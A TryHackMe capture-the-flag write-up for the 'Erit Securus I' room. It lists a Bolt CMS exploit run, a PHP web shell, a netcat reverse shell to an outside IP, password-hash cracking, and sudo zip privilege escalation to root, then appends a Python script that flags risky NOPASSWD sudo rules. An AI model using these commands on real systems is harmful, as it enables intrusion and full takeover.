Erit Securus I TryHackMe Writeup

https://tryhackme.com/room/eritsecurusi

Information Gathering

Scanning

nmap -sV 10.10.196.105

Answer: 2

Answer: 22,80

Enumeration

Answer: bolt

Gaining Access

python3 exploit.py http://10.10.116.95 admin password
echo '<?php system($_GET["cmd"]);?>'>cmd.php
ln -s $(which nc) .
python -m SimpleHTTPServer 80
http://10.10.196.105/files/cmd.php?cmd=chmod 755 nc
nc -nlvp 1234
http://10.10.196.105/files/cmd.php?cmd=./nc -e /bin/bash 10.2.12.26 1234
python -c 'import pty;pty.spawn("/bin/bash")'

Answer: www-data

Privilege Escalation

SELECT * FROM bolt_users;
john hash.txt -w=/usr/share/wordlists/rockyou.txt

Pivoting

Answer: (jsmith) NOPASSWD: /usr/bin/zip

Privilege Escalation #2

TF=$(mktemp -u)
sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'
python -c 'import pty;pty.spawn("/bin/bash")'

Answer: ALL : ALL NOPASSWD: ALL
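
A defender-side check for the two sudo rules recorded above, as an added example that is not part of the original writeup: it parses `sudo -l` output and flags NOPASSWD grants of `ALL` or of binaries that can run arbitrary commands, such as the `zip` rule used here. The sample output, the user and host names in it, and the short binary list are constructed for illustration.

```python
import os
import re

# Binaries that can run arbitrary commands when granted through sudo.
# Short illustrative list assumed for this example; extend it from GTFOBins.
SHELL_CAPABLE = {"zip", "tar", "vim", "find", "awk", "less", "python", "python3"}

# One rule line of `sudo -l` output: "(runas) [TAG: ...] cmd[, cmd ...]".
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample; the user and host names are placeholders.
SAMPLE = """\
User exampleuser may run the following commands on examplehost:
    (jsmith) NOPASSWD: /usr/bin/zip
    (ALL : ALL) NOPASSWD: ALL
    (root) /usr/bin/systemctl status nginx
"""


def audit_sudo_rules(sudo_l_output):
    """Return (severity, runas, command, reason) for each risky rule.

    Simplification: tags at the start of a line are applied to every
    command on that line; sudoers also allows tags to change mid-list.
    """
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header lines and Defaults entries
        runas = m.group("runas").strip()
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue  # tolerate a trailing comma
            if cmd == "ALL":
                sev = "critical" if nopasswd else "high"
                reason = "any command may be run as " + runas
            elif os.path.basename(cmd.split()[0]) in SHELL_CAPABLE:
                sev = "high" if nopasswd else "medium"
                reason = "binary can spawn a shell as " + runas
            else:
                continue  # no known escape for this command
            if nopasswd:
                reason += ", without a password"
            findings.append((sev, runas, cmd, reason))
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE):
        print(*finding, sep=" | ")
```

On a real host, feed it the output of `sudo -l -U <user>` for each account and review every finding against what that account actually needs.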
